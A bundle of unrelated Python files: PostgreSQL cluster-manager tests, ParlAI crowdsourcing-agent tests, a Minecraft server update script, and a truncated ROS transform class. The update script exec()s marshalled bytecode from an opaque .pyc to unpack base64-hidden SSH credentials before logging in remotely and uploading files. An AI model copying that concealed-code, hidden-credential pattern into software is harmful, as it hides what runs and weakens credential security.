def test_replica_method_can_work_without_replication_connection(self):
self.assertFalse(self.p.replica_method_can_work_without_replication_connection('basebackup'))
self.assertFalse(self.p.replica_method_can_work_without_replication_connection('foobar'))
self.p.config._config['foo'] = {'command': 'bar', 'no_master': 1}
self.assertTrue(self.p.replica_method_can_work_without_replication_connection('foo'))
self.p.config._config['foo'] = {'command': 'bar'}
self.assertFalse(self.p.replica_method_can_work_without_replication_connection('foo'))
@patch('time.sleep', Mock())
@patch.object(Postgresql, 'is_running', Mock(return_value=True))
@patch.object(MockCursor, 'fetchone')
def test_reload_config(self, mock_fetchone):
mock_fetchone.return_value = (1,)
parameters = self._PARAMETERS.copy()
parameters.pop('f.oo')
parameters['wal_buffers'] = '512'
config = {'pg_hba': [''], 'pg_ident': [''], 'use_unix_socket': True, 'authentication': {},
'retry_timeout': 10, 'listen': '*', 'krbsrvname': 'postgres', 'parameters': parameters}
self.p.reload_config(config)
mock_fetchone.side_effect = Exception
parameters['b.ar'] = 'bar'
self.p.reload_config(config)
parameters['autovacuum'] = 'on'
self.p.reload_config(config)
parameters['autovacuum'] = 'off'
parameters.pop('search_path')
config['listen'] = '*:5433'
self.p.reload_config(config)
parameters['unix_socket_directories'] = '.'
self.p.reload_config(config)
self.p.config.resolve_connection_addresses()
@patch.object(Postgresql, '_version_file_exists', Mock(return_value=True))
def test_get_major_version(self):
with patch.object(builtins, 'open', mock_open(read_data='9.4')):
self.assertEqual(self.p.get_major_version(), 90400)
with patch.object(builtins, 'open', Mock(side_effect=Exception)):
self.assertEqual(self.p.get_major_version(), 0)
def test_postmaster_start_time(self):
with patch.object(MockCursor, "fetchone", Mock(return_value=('foo', True, '', '', '', '', False))):
self.assertEqual(self.p.postmaster_start_time(), 'foo')
t = Thread(target=self.p.postmaster_start_time)
t.start()
t.join()
with patch.object(MockCursor, "execute", side_effect=psycopg2.Error):
self.assertIsNone(self.p.postmaster_start_time())
def test_check_for_startup(self):
with patch('subprocess.call', return_value=0):
self.p._state = 'starting'
self.assertFalse(self.p.check_for_startup())
self.assertEqual(self.p.state, 'running')
with patch('subprocess.call', return_value=1):
self.p._state = 'starting'
self.assertTrue(self.p.check_for_startup())
self.assertEqual(self.p.state, 'starting')
with patch('subprocess.call', return_value=2):
self.p._state = 'starting'
self.assertFalse(self.p.check_for_startup())
self.assertEqual(self.p.state, 'start failed')
with patch('subprocess.call', return_value=0):
self.p._state = 'running'
self.assertFalse(self.p.check_for_startup())
self.assertEqual(self.p.state, 'running')
with patch('subprocess.call', return_value=127):
self.p._state = 'running'
self.assertFalse(self.p.check_for_startup())
self.assertEqual(self.p.state, 'running')
self.p._state = 'starting'
self.assertFalse(self.p.check_for_startup())
self.assertEqual(self.p.state, 'running')
def test_wait_for_startup(self):
state = {'sleeps': 0, 'num_rejects': 0, 'final_return': 0}
self.__thread_ident = current_thread().ident
def increment_sleeps(*args):
if current_thread().ident == self.__thread_ident:
print("Sleep")
state['sleeps'] += 1
def isready_return(*args):
ret = 1 if state['sleeps'] < state['num_rejects'] else state['final_return']
print("Isready {0} {1}".format(ret, state))
return ret
def time_in_state(*args):
return state['sleeps']
with patch('subprocess.call', side_effect=isready_return):
with patch('time.sleep', side_effect=increment_sleeps):
self.p.time_in_state = Mock(side_effect=time_in_state)
self.p._state = 'stopped'
self.assertTrue(self.p.wait_for_startup())
self.assertEqual(state['sleeps'], 0)
self.p._state = 'starting'
state['num_rejects'] = 5
self.assertTrue(self.p.wait_for_startup())
self.assertEqual(state['sleeps'], 5)
self.p._state = 'starting'
state['sleeps'] = 0
state['final_return'] = 2
self.assertFalse(self.p.wait_for_startup())
self.p._state = 'starting'
state['sleeps'] = 0
state['final_return'] = 0
self.assertFalse(self.p.wait_for_startup(timeout=2))
self.assertEqual(state['sleeps'], 3)
with patch.object(Postgresql, 'check_startup_state_changed', Mock(return_value=False)):
self.p.cancellable.cancel()
self.p._state = 'starting'
self.assertIsNone(self.p.wait_for_startup())
def test_pick_sync_standby(self):
cluster = Cluster(True, None, self.leader, 0, [self.me, self.other, self.leadermem], None,
SyncState(0, self.me.name, self.leadermem.name), None)
with patch.object(Postgresql, "query", return_value=[
(self.leadermem.name, 'streaming', 'sync'),
(self.me.name, 'streaming', 'async'),
(self.other.name, 'streaming', 'async'),
]):
self.assertEqual(self.p.pick_synchronous_standby(cluster), (self.leadermem.name, True))
with patch.object(Postgresql, "query", return_value=[
(self.me.name, 'streaming', 'async'),
(self.leadermem.name, 'streaming', 'potential'),
(self.other.name, 'streaming', 'async'),
]):
self.assertEqual(self.p.pick_synchronous_standby(cluster), (self.leadermem.name, False))
with patch.object(Postgresql, "query", return_value=[
(self.me.name, 'streaming', 'async'),
(self.other.name, 'streaming', 'async'),
]):
self.assertEqual(self.p.pick_synchronous_standby(cluster), (self.me.name, False))
with patch.object(Postgresql, "query", return_value=[
('missing', 'streaming', 'sync'),
(self.me.name, 'streaming', 'async'),
(self.other.name, 'streaming', 'async'),
]):
self.assertEqual(self.p.pick_synchronous_standby(cluster), (self.me.name, False))
with patch.object(Postgresql, "query", return_value=[]):
self.assertEqual(self.p.pick_synchronous_standby(cluster), (None, False))
def test_set_sync_standby(self):
def value_in_conf():
with open(os.path.join(self.p.data_dir, 'postgresql.conf')) as f:
for line in f:
if line.startswith('synchronous_standby_names'):
return line.strip()
mock_reload = self.p.reload = Mock()
self.p.config.set_synchronous_standby('n1')
self.assertEqual(value_in_conf(), "synchronous_standby_names = 'n1'")
mock_reload.assert_called()
mock_reload.reset_mock()
self.p.config.set_synchronous_standby('n1')
mock_reload.assert_not_called()
self.assertEqual(value_in_conf(), "synchronous_standby_names = 'n1'")
self.p.config.set_synchronous_standby('n2')
mock_reload.assert_called()
self.assertEqual(value_in_conf(), "synchronous_standby_names = 'n2'")
mock_reload.reset_mock()
self.p.config.set_synchronous_standby(None)
mock_reload.assert_called()
self.assertEqual(value_in_conf(), None)
def test_get_server_parameters(self):
config = {'synchronous_mode': True, 'parameters': {'wal_level': 'hot_standby'}, 'listen': '0'}
self.p.config.get_server_parameters(config)
config['synchronous_mode_strict'] = True
self.p.config.get_server_parameters(config)
self.p.config.set_synchronous_standby('foo')
self.p.config.get_server_parameters(config)
@patch('time.sleep', Mock())
def test__wait_for_connection_close(self):
mock_postmaster = MockPostmaster()
with patch.object(Postgresql, 'is_running', Mock(return_value=mock_postmaster)):
mock_postmaster.is_running.side_effect = [True, False, False]
mock_callback = Mock()
self.p.stop(on_safepoint=mock_callback)
mock_postmaster.is_running.side_effect = [True, False, False]
with patch.object(MockCursor, "execute", Mock(side_effect=psycopg2.Error)):
self.p.stop(on_safepoint=mock_callback)
def test_terminate_starting_postmaster(self):
mock_postmaster = MockPostmaster()
self.p.terminate_starting_postmaster(mock_postmaster)
mock_postmaster.signal_stop.assert_called()
mock_postmaster.wait.assert_called()
def test_read_postmaster_opts(self):
m = mock_open(read_data='/usr/lib/postgres/9.6/bin/postgres "-D" "data/postgresql0" \
"--listen_addresses=127.0.0.1" "--port=5432" "--hot_standby=on" "--wal_level=hot_standby" \
"--wal_log_hints=on" "--max_wal_senders=5" "--max_replication_slots=5"\n')
with patch.object(builtins, 'open', m):
data = self.p.read_postmaster_opts()
self.assertEqual(data['wal_level'], 'hot_standby')
self.assertEqual(int(data['max_replication_slots']), 5)
self.assertEqual(data.get('D'), None)
m.side_effect = IOError
data = self.p.read_postmaster_opts()
self.assertEqual(data, dict())
@patch('psutil.Popen')
def test_single_user_mode(self, subprocess_popen_mock):
subprocess_popen_mock.return_value.wait.return_value = 0
self.assertEqual(self.p.single_user_mode('CHECKPOINT', {'archive_mode': 'on'}), 0)
@patch('os.listdir', Mock(side_effect=[OSError, ['a', 'b']]))
@patch('os.unlink', Mock(side_effect=OSError))
@patch('os.remove', Mock())
@patch('os.path.islink', Mock(side_effect=[True, False]))
@patch('os.path.isfile', Mock(return_value=True))
def test_cleanup_archive_status(self):
self.p.cleanup_archive_status()
self.p.cleanup_archive_status()
@patch('os.unlink', Mock())
@patch('os.listdir', Mock(return_value=[]))
@patch('os.path.isfile', Mock(return_value=True))
@patch.object(Postgresql, 'read_postmaster_opts', Mock(return_value={}))
@patch.object(Postgresql, 'single_user_mode', Mock(return_value=0))
def test_fix_cluster_state(self):
self.assertTrue(self.p.fix_cluster_state())
def test_replica_cached_timeline(self):
self.assertEqual(self.p.replica_cached_timeline(1), 2)
def test_get_master_timeline(self):
self.assertEqual(self.p.get_master_timeline(), 1)
@patch.object(Postgresql, 'get_postgres_role_from_data_directory', Mock(return_value='replica'))
def test__build_effective_configuration(self):
with patch.object(Postgresql, 'controldata',
Mock(return_value={'max_connections setting': '200',
'max_worker_processes setting': '20',
'max_prepared_xacts setting': '100',
'max_locks_per_xact setting': '100',
'max_wal_senders setting': 10})):
self.p.cancellable.cancel()
self.assertFalse(self.p.start())
self.assertTrue(self.p.pending_restart)
|
test_mturk_agent.py
|
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import unittest
import os
import time
import threading
from unittest import mock
from parlai.mturk.core.agents import MTurkAgent
from parlai.mturk.core.shared_utils import AssignState
from parlai.mturk.core.mturk_manager import MTurkManager
from parlai.core.params import ParlaiParser
import parlai.mturk.core.worker_manager as WorkerManagerFile
import parlai.mturk.core.data_model as data_model
parent_dir = os.path.dirname(os.path.abspath(__file__))
WorkerManagerFile.DISCONNECT_FILE_NAME = 'disconnect-test.pickle'
WorkerManagerFile.MAX_DISCONNECTS = 1
WorkerManagerFile.parent_dir = os.path.dirname(os.path.abspath(__file__))
TEST_WORKER_ID_1 = 'TEST_WORKER_ID_1'
TEST_ASSIGNMENT_ID_1 = 'TEST_ASSIGNMENT_ID_1'
TEST_HIT_ID_1 = 'TEST_HIT_ID_1'
TEST_CONV_ID_1 = 'TEST_CONV_ID_1'
FAKE_ID = 'BOGUS'
MESSAGE_ID_1 = 'MESSAGE_ID_1'
MESSAGE_ID_2 = 'MESSAGE_ID_2'
COMMAND_ID_1 = 'COMMAND_ID_1'
MESSAGE_TYPE = data_model.MESSAGE_TYPE_MESSAGE
COMMAND_TYPE = data_model.MESSAGE_TYPE_COMMAND
MESSAGE_1 = {'message_id': MESSAGE_ID_1, 'type': MESSAGE_TYPE}
MESSAGE_2 = {'message_id': MESSAGE_ID_2, 'type': MESSAGE_TYPE}
COMMAND_1 = {'message_id': COMMAND_ID_1, 'type': COMMAND_TYPE}
AGENT_ID = 'AGENT_ID'
ACT_1 = {'text': 'THIS IS A MESSAGE', 'id': AGENT_ID}
ACT_2 = {'text': 'THIS IS A MESSAGE AGAIN', 'id': AGENT_ID}
active_statuses = [
AssignState.STATUS_NONE,
AssignState.STATUS_ONBOARDING,
AssignState.STATUS_WAITING,
AssignState.STATUS_IN_TASK,
]
complete_statuses = [
AssignState.STATUS_DONE,
AssignState.STATUS_DISCONNECT,
AssignState.STATUS_PARTNER_DISCONNECT,
AssignState.STATUS_PARTNER_DISCONNECT_EARLY,
AssignState.STATUS_EXPIRED,
AssignState.STATUS_RETURNED,
]
statuses = active_statuses + complete_statuses
class TestAssignState(unittest.TestCase):
"""
Various unit tests for the AssignState class.
"""
def setUp(self):
self.agent_state1 = AssignState()
self.agent_state2 = AssignState(status=AssignState.STATUS_IN_TASK)
argparser = ParlaiParser(False, False)
argparser.add_parlai_data_path()
argparser.add_mturk_args()
self.opt = argparser.parse_args()
self.opt['task'] = 'unittest'
self.opt['assignment_duration_in_seconds'] = 6
mturk_agent_ids = ['mturk_agent_1']
self.mturk_manager = MTurkManager(opt=self.opt, mturk_agent_ids=mturk_agent_ids)
self.worker_manager = self.mturk_manager.worker_manager
def tearDown(self):
self.mturk_manager.shutdown()
def test_assign_state_init(self):
"""
Test proper initialization of assignment states.
"""
self.assertEqual(self.agent_state1.status, AssignState.STATUS_NONE)
self.assertEqual(len(self.agent_state1.messages), 0)
self.assertEqual(len(self.agent_state1.message_ids), 0)
self.assertIsNone(self.agent_state1.last_command)
self.assertEqual(self.agent_state2.status, AssignState.STATUS_IN_TASK)
self.assertEqual(len(self.agent_state1.messages), 0)
self.assertEqual(len(self.agent_state1.message_ids), 0)
self.assertIsNone(self.agent_state1.last_command)
def test_message_management(self):
"""
Test message management in an AssignState.
"""
# Ensure message appends succeed and are idempotent
self.agent_state1.append_message(MESSAGE_1)
self.assertEqual(len(self.agent_state1.get_messages()), 1)
self.agent_state1.append_message(MESSAGE_2)
self.assertEqual(len(self.agent_state1.get_messages()), 2)
self.agent_state1.append_message(MESSAGE_1)
self.assertEqual(len(self.agent_state1.get_messages()), 2)
self.assertEqual(len(self.agent_state2.get_messages()), 0)
self.assertIn(MESSAGE_1, self.agent_state1.get_messages())
self.assertIn(MESSAGE_2, self.agent_state1.get_messages())
self.assertEqual(len(self.agent_state1.message_ids), 2)
self.agent_state2.append_message(MESSAGE_1)
self.assertEqual(len(self.agent_state2.message_ids), 1)
# Ensure command interactions work as expected
self.agent_state1.set_last_command(COMMAND_1)
self.assertEqual(self.agent_state1.get_last_command(), COMMAND_1)
# Ensure clearing messages acts as intended and doesn't clear agent2
self.agent_state1.clear_messages()
self.assertEqual(len(self.agent_state1.messages), 0)
self.assertEqual(len(self.agent_state1.message_ids), 0)
self.assertIsNone(self.agent_state1.last_command)
self.assertEqual(len(self.agent_state2.message_ids), 1)
def test_state_handles_status(self):
"""
Ensures status updates and is_final are valid.
"""
for status in statuses:
self.agent_state1.set_status(status)
self.assertEqual(self.agent_state1.get_status(), status)
for status in active_statuses:
self.agent_state1.set_status(status)
self.assertFalse(self.agent_state1.is_final())
for status in complete_statuses:
self.agent_state1.set_status(status)
self.assertTrue(self.agent_state1.is_final())
# TODO update the below once bonus is default
for status in complete_statuses:
self.agent_state1.set_status(status)
text, command = self.agent_state1.get_inactive_command_text()
self.assertIsNotNone(text)
self.assertIsNotNone(command)
class TestMTurkAgent(unittest.TestCase):
"""
Various unit tests for the MTurkAgent class.
"""
def setUp(self):
argparser = ParlaiParser(False, False)
argparser.add_parlai_data_path()
argparser.add_mturk_args()
self.opt = argparser.parse_args()
self.opt['task'] = 'unittest'
self.opt['assignment_duration_in_seconds'] = 6
mturk_agent_ids = ['mturk_agent_1']
self.mturk_manager = MTurkManager(
opt=self.opt.copy(), mturk_agent_ids=mturk_agent_ids
)
self.worker_manager = self.mturk_manager.worker_manager
self.turk_agent = MTurkAgent(
self.opt.copy(),
self.mturk_manager,
TEST_HIT_ID_1,
TEST_ASSIGNMENT_ID_1,
TEST_WORKER_ID_1,
)
def tearDown(self):
self.mturk_manager.shutdown()
disconnect_path = os.path.join(parent_dir, 'disconnect-test.pickle')
if os.path.exists(disconnect_path):
os.remove(disconnect_path)
def test_init(self):
"""
Test initialization of an agent.
"""
self.assertIsNotNone(self.turk_agent.creation_time)
self.assertIsNone(self.turk_agent.id)
self.assertIsNone(self.turk_agent.message_request_time)
self.assertIsNone(self.turk_agent.conversation_id)
self.assertFalse(self.turk_agent.some_agent_disconnected)
self.assertFalse(self.turk_agent.hit_is_expired)
self.assertFalse(self.turk_agent.hit_is_abandoned)
self.assertFalse(self.turk_agent.hit_is_returned)
self.assertFalse(self.turk_agent.hit_is_complete)
self.assertFalse(self.turk_agent.disconnected)
self.assertTrue(self.turk_agent.alived)
def test_state_wrappers(self):
"""
Test the mturk agent wrappers around its state.
"""
for status in statuses:
self.turk_agent.set_status(status)
self.assertEqual(self.turk_agent.get_status(), status)
for status in [AssignState.STATUS_DONE, AssignState.STATUS_PARTNER_DISCONNECT]:
self.turk_agent.set_status(status)
self.assertTrue(self.turk_agent.submitted_hit())
for status in active_statuses:
self.turk_agent.set_status(status)
self.assertFalse(self.turk_agent.is_final())
for status in complete_statuses:
self.turk_agent.set_status(status)
self.assertTrue(self.turk_agent.is_final())
self.turk_agent.append_message(MESSAGE_1)
self.assertEqual(len(self.turk_agent.get_messages()), 1)
self.turk_agent.append_message(MESSAGE_2)
self.assertEqual(len(self.turk_agent.get_messages()), 2)
self.turk_agent.append_message(MESSAGE_1)
self.assertEqual(len(self.turk_agent.get_messages()), 2)
self.assertIn(MESSAGE_1, self.turk_agent.get_messages())
self.assertIn(MESSAGE_2, self.turk_agent.get_messages())
# Ensure command interactions work as expected
self.turk_agent.set_last_command(COMMAND_1)
self.assertEqual(self.turk_agent.get_last_command(), COMMAND_1)
self.turk_agent.clear_messages()
self.assertEqual(len(self.turk_agent.get_messages()), 0)
# In task checks
self.turk_agent.conversation_id = 't_12345'
self.assertTrue(self.turk_agent.is_in_task())
self.turk_agent.conversation_id = 'b_12345'
self.assertFalse(self.turk_agent.is_in_task())
def test_connection_id(self):
"""
Ensure the connection_id hasn't changed.
"""
connection_id = "{}_{}".format(
self.turk_agent.worker_id, self.turk_agent.assignment_id
)
self.assertEqual(self.turk_agent.get_connection_id(), connection_id)
def test_inactive_data(self):
"""
Ensure data packet generated for inactive commands is valid.
"""
for status in complete_statuses:
self.turk_agent.set_status(status)
data = self.turk_agent.get_inactive_command_data()
self.assertIsNotNone(data['text'])
self.assertIsNotNone(data['inactive_text'])
self.assertEqual(data['conversation_id'], self.turk_agent.conversation_id)
self.assertEqual(data['agent_id'], TEST_WORKER_ID_1)
def test_status_change(self):
has_changed = False
self.turk_agent.set_status(AssignState.STATUS_ONBOARDING)
def wait_for_status_wrap():
nonlocal has_changed # noqa 999 we don't use python2
self.turk_agent.wait_for_status(AssignState.STATUS_WAITING)
has_changed = True
t = threading.Thread(target=wait_for_status_wrap, daemon=True)
t.start()
self.assertFalse(has_changed)
time.sleep(0.07)
self.assertFalse(has_changed)
self.turk_agent.set_status(AssignState.STATUS_WAITING)
time.sleep(0.07)
self.assertTrue(has_changed)
def test_message_queue(self):
"""
Ensure observations and acts work as expected.
"""
self.mturk_manager.send_message = mock.MagicMock()
self.turk_agent.observe(ACT_1)
self.mturk_manager.send_message.assert_called_with(
TEST_WORKER_ID_1, TEST_ASSIGNMENT_ID_1, ACT_1
)
# First act comes through the queue and returns properly
self.assertTrue(self.turk_agent.msg_queue.empty())
self.turk_agent.id = AGENT_ID
self.turk_agent.put_data(MESSAGE_ID_1, ACT_1)
self.assertTrue(self.turk_agent.recieved_packets[MESSAGE_ID_1])
self.assertFalse(self.turk_agent.msg_queue.empty())
returned_act = self.turk_agent.get_new_act_message()
self.assertEqual(returned_act, ACT_1)
# Repeat act is ignored
self.turk_agent.put_data(MESSAGE_ID_1, ACT_1)
self.assertTrue(self.turk_agent.msg_queue.empty())
for i in range(100):
self.turk_agent.put_data(str(i), ACT_1)
self.assertEqual(self.turk_agent.msg_queue.qsize(), 100)
self.turk_agent.flush_msg_queue()
self.assertTrue(self.turk_agent.msg_queue.empty())
# Test non-act messages
blank_message = self.turk_agent.get_new_act_message()
self.assertIsNone(blank_message)
self.turk_agent.disconnected = True
disconnect_message = self.turk_agent.get_new_act_message()
self.turk_agent.disconnected = False
self.assertEqual(
disconnect_message['text'], self.turk_agent.MTURK_DISCONNECT_MESSAGE
)
self.turk_agent.hit_is_returned = True
return_message = self.turk_agent.get_new_act_message()
self.assertEqual(return_message['text'], self.turk_agent.RETURN_MESSAGE)
self.turk_agent.hit_is_returned = False
# Reduce state
self.turk_agent.reduce_state()
self.assertIsNone(self.turk_agent.msg_queue)
self.assertIsNone(self.turk_agent.recieved_packets)
def test_message_acts(self):
self.mturk_manager.send_command = mock.MagicMock()
self.mturk_manager.handle_turker_timeout = mock.MagicMock()
# non-Blocking check
self.assertIsNone(self.turk_agent.message_request_time)
returned_act = self.turk_agent.act(blocking=False)
self.assertIsNotNone(self.turk_agent.message_request_time)
self.assertIsNone(returned_act)
self.turk_agent.id = AGENT_ID
self.turk_agent.put_data(MESSAGE_ID_1, ACT_1)
returned_act = self.turk_agent.act(blocking=False)
self.assertIsNone(self.turk_agent.message_request_time)
self.assertEqual(returned_act, ACT_1)
self.mturk_manager.send_command.assert_called_once()
# non-Blocking timeout check
self.mturk_manager.send_command = mock.MagicMock()
returned_act = self.turk_agent.act(timeout=0.07, blocking=False)
self.assertIsNotNone(self.turk_agent.message_request_time)
self.assertIsNone(returned_act)
while returned_act is None:
returned_act = self.turk_agent.act(timeout=0.07, blocking=False)
self.mturk_manager.send_command.assert_called_once()
self.mturk_manager.handle_turker_timeout.assert_called_once()
self.assertEqual(returned_act['text'], self.turk_agent.TIMEOUT_MESSAGE)
# Blocking timeout check
self.mturk_manager.send_command = mock.MagicMock()
self.mturk_manager.handle_turker_timeout = mock.MagicMock()
returned_act = self.turk_agent.act(timeout=0.07)
self.mturk_manager.send_command.assert_called_once()
self.mturk_manager.handle_turker_timeout.assert_called_once()
self.assertEqual(returned_act['text'], self.turk_agent.TIMEOUT_MESSAGE)
if __name__ == '__main__':
unittest.main(buffer=True)
|
Update_ALL.py
|
from wakeonlan import send_magic_packet
from fabric import Connection
import marshal
import types
import threading
from queue import Queue
import socket
import time
import base64
import sys
import paramiko.ssh_exception
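# starting_module reports its outcome back to the caller through the queue c_q:
# 1 means success, while 2-6 identify the failure point (missing configs.pyc,
# DNS lookup, wake-on-LAN send, power-on check, file transfer).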
def starting_module(c_q):
print("###########################################")
print("## UPDATE ALL - V3.0 ##")
print("## AUTHOR - MAFIOSI ##")
print("###########################################")
print()
print("[WARNING] DO NOT CLOSE THE PROGRAM WHILE IT'S RUNNING")
time.sleep(2)
print()
print("[STATE] Checking file configs.pyc availability....")
try:
s = open('configs.pyc', 'rb')
print("[RESULT] File configs.pyc found")
print()
except:
print("[RESULT] Move file configs.pyc to the same folder as this EXECUTABLE")
c_q.put(2)
return
s.seek(12)
olives = marshal.load(s)
garden = types.ModuleType("Garden")
exec(olives,garden.__dict__)
alpha = base64.decodebytes(bytes(garden.pick(1)))
beta = base64.decodebytes(bytes(garden.pick(2)))
gamma = base64.decodebytes(bytes(garden.pick(3)))
delta = base64.decodebytes(bytes(garden.pick(4)))
x = 9
alpha = alpha.decode()
beta = beta.decode()
gamma = gamma.decode()
delta = delta.decode()
# CONNECTION VARIABLES
server = Connection(host=gamma, user=alpha, port=22, connect_kwargs={"password": beta})
command = 'nohup screen -S mine -d -m python3 Internal_MManager.py &'
# TIME PC TAKES TO TURN ON
zzz = 50
verify = False
##########################################
########## MAIN PROGRAM ##########
##########################################
while True:
print('[STATE] Looking up server info...')
try:
time.sleep(1)
i = socket.gethostbyname(gamma)
time.sleep(1)
print('[RESULT] Server OK')
print()
except (Exception, ConnectionResetError, socket.timeout, paramiko.ssh_exception.SSHException) as err:
print("[RESULT] Server info could not be retrieved, try again later")
c_q.put(3)
return
# TELLS PC TO TURN ON
print('[STATE] Checking if Server is ON...')
try:
send_magic_packet(delta, ip_address=i, port=x)
except (Exception, ConnectionResetError, socket.timeout, paramiko.ssh_exception.SSHException) as err:
error = err
print("[RESULT] Server cannot be turned ON, try again later")
c_q.put(4)
return
# CHECKS IF PC IS ALREADY ON AND CONNECTS
try:
server.run('ls', hide=True)
verify = server.is_connected
except (Exception, ConnectionResetError, socket.timeout, paramiko.ssh_exception.SSHException) as err:
print("[RESULT] Server is turned off --> Turning it ON...")
if not verify:
print("[ACTION] Sending Magic Packets")
print("[ACTION] Waiting for Server to turn ON. ETA: ~60 sec")
print("[WARNING] Program should Work even with Traceback error - Cause (missing useless repositories)")
time.sleep(zzz)
try:
server.run('ls', hide=True)
verify = server.is_connected
if verify:
print("[RESULT] Server is turned ON")
print()
else:
print("[RESULT] Server cannot be turned ON, try again later")
c_q.put(5)
return
except (Exception, ConnectionResetError, socket.timeout, paramiko.ssh_exception.SSHException) as err:
error = err
print("[RESULT] Server cannot be turned ON, try again later")
c_q.put(5)
return
else:
print("[RESULT] Server is Turned ON")
print()
# TRY TO TRANSFER FILES TO PC
# MODDED - server.put('D:\Projects\Minecraft_Server_Management\Zip_File_Distribution\ALL_MODDED.zip', '/opt/Transfer/Vanilla/Distribution')
# VANILLA - server.put('D:\Projects\Minecraft_Server_Management\Zip_File_Distribution\ALL_VANNILA.zip', '/opt/Transfer/Modded/Distribution')
print("[STATE] Transferring Files")
try:
            server.put(r'D:\Projects\Minecraft_Server_Management\Zip_File_Distribution\ALL_MODDED.zip', '/opt/Transfer/Vanilla/Distribution')
            print("[RESULT] Files Transferred Successfully")
print()
c_q.put(1)
break
except:
print("[RESULT] Files could not be transferred")
c_q.put(6)
break
return
##########################################
########## MAIN ROUTINE ##########
##########################################
def main():
sys.tracebacklimit = None
    close_queue = Queue()
thread_start_server = threading.Thread(name='Start_Server', target=starting_module, daemon=True, args=(close_queue,))
thread_start_server.start()
# WAITS FOR THREAD TO GIVE OUTPUT (BAD OR GOOD)
while True:
state = close_queue.get()
if state == 1:
print('[RESULT] IT EXECUTED SUCCESSFULLY - YOU MAY CLOSE THE PROGRAM')
time.sleep(8)
return
else:
print("ERROR: " + str(state))
print('[WARNING] PLEASE WARN DEVELOPER OF ERROR NUMBER (or just move the damn configs file)')
time.sleep(8)
return
if __name__ == '__main__':
main()
|
transform_handler.py
|
import threading
import numpy as np
import rospy
import tf2_ros
from geometry_msgs.msg import TransformStamped
from visualization_msgs.msg import Marker
from tf import transformations
class TransformHandler(object):
"""
This class uses a tfBuffer to handle transforms related to the vision kit.
"""
def __init__(self):
self.__tf_buffer = tf2_ros.Buffer()
self.__debug_stop_event = threading.Event()
self.__debug_thread = None
self.__debug_current_ws = None # only for debugging purposes
def __del__(self):
self.disable_debug()
def set_relative_pose_object(self, workspace, x_rel, y_rel, yaw_rel, yaw_center=None):
"""
Updates the transform base_link -> object_base in local tfBuffer
:param workspace: reference workspace object
:param x_rel: object base x position relative to workspace
:param y_rel: object base y position relative to workspace
:param yaw_rel: object base rotation on z relative to workspace
        :param yaw_center: reference yaw used to keep the object yaw within +/- pi/2 of it and avoid over-rotation
"""
position = np.dot(workspace.position_matrix, np.array([x_rel, y_rel, 1]))
camera_rotation = transformations.euler_matrix(0, 0, yaw_rel)
# Here we correct the object orientation to be similar to base_link if
        # the object is on the ground. Not strictly necessary, to be honest...
convention_rotation = np.array([[0, -1, 0, 0],
[-1, 0, 0, 0],
[0, 0, -1, 0],
[0, 0, 0, 1]])
object_rotation = transformations.concatenate_matrices(
workspace.rotation_matrix, camera_rotation, convention_rotation)
roll, pitch, yaw = transformations.euler_from_matrix(object_rotation)
# Correcting yaw to avoid out of reach targets
if yaw_center is not None:
if yaw < yaw_center - np.pi / 2:
yaw += np.pi
elif yaw > yaw_center + np.pi / 2:
yaw -= np.pi
q = transformations.quaternion_from_euler(roll, pitch, yaw)
t = TransformStamped()
t.transform.translation.x = position[0]
t.transform.translation.y = position[1]
t.transform.translation.z = position[2]
t.transform.rotation.x = q[0]
t.transform.rotation.y = q[1]
t.transform.rotation.z = q[2]
t.transform.rotation.w = q[3]
t.header.frame_id = "base_link"
t.child_frame_id = "object_base"
self.__tf_buffer.set_transform(t, "default_authority")
def set_grip(self, grip):
"""
Updates the transform object_base -> tool_link_target in local tfBuffer
:param grip:
"""
if grip.transform.header.frame_id != "object_base":
print "Grip transform need to have header frame 'object_base'"
return False
if grip.transform.child_frame_id != "tool_link_target":
print "Grip transform need to have child frame 'tool_link_target'"
return False
self.__tf_buffer.set_transform(grip.transform, "default_authority")
return True
def get_object_base_transform(self):
"""
Reads the transform base_link -> object_base from local tfBuffer
:returns: transform base_link -> object_base
"""
return self.__tf_buffer.lookup_transform("base_link", "object_base",
rospy.Time(0))
def get_gripping_transform(self):
"""
Reads the transform base_link -> tool_link_target from local tfBuffer
:returns: transform base_link -> tool_link_target
"""
return self.__tf_buffer.lookup_transform(
"base_link", "tool_link_target", rospy.Time(0))
def get_calibration_tip_position(self, robot_pose):
"""
Retrieves the position of the calibration tip from a given robot pose.
:param robot_pose: pose of the robot's tool_link
:returns: xyz position of calibration tip in robot coordinates
"""
# First apply transform for robot pose
base_link_to_tool_link = self.transform_from_euler(
robot_pose.position.x, robot_pose.position.y, robot_pose.position.z,
robot_pose.rpy.roll, robot_pose.rpy.pitch, robot_pose.rpy.yaw,
"base_link", "tool_link"
)
self.__tf_buffer.set_transform(base_link_to_tool_link,
"default_authority")
# Manually apply transform for the calibration tool
tool_link_to_calib_tip = self.transform_from_euler(
0.025, 0, 0, 0, 0, 0, "tool_link", "calibration_tip"
)
self.__tf_buffer.set_transform(tool_link_to_calib_tip,
"default_authority")
base_link_to_calib_tip = self.__tf_buffer.lookup_transform(
"base_link", "calibration_tip", rospy.Time(0))
return base_link_to_calib_tip.transform.translation
def get_grip_transform(self, ws_name, robot_pose):
"""
Retrieves the transform needed to create a grip supposing the object
is placed on the origin of the given workspace.
:param ws_name: name of the workspace the object is placed on
:param robot_pose: pose of the robot's tool_link
"""
# First apply transform for robot pose
base_link_to_tool_link = self.transform_from_euler(
robot_pose.position.x, robot_pose.position.y, robot_pose.position.z,
robot_pose.rpy.roll, robot_pose.rpy.pitch, robot_pose.rpy.yaw,
"base_link", "tool_link"
)
self.__tf_buffer.set_transform(base_link_to_tool_link,
"default_authority")
# Manually place object on origin
self.set_relative_pose_object(ws_name, 0, 0, 0)
# Lookup the grip
t = self.__tf_buffer.lookup_transform("object_base", "tool_link",
rospy.Time(0))
t.child_frame_id = "tool_link_target"
return t
@staticmethod
def transform_from_euler(x, y, z, roll, pitch, yaw, header_frame_id,
child_frame_id):
"""
Creates a new stamped transform from translation and euler-orientation
:param x: x translation
:param y: y translation
:param z: z translation
:param roll: orientation roll
:param pitch: orientation pitch
:param yaw: orientation yaw
:param header_frame_id: transform from this frame
:param child_frame_id: transform to this frame
:returns: transform
"""
t = TransformStamped()
t.transform.translation.x = x
t.transform.translation.y = y
t.transform.translation.z = z
q = transformations.quaternion_from_euler(roll, pitch, yaw)
t.transform.rotation.x = q[0]
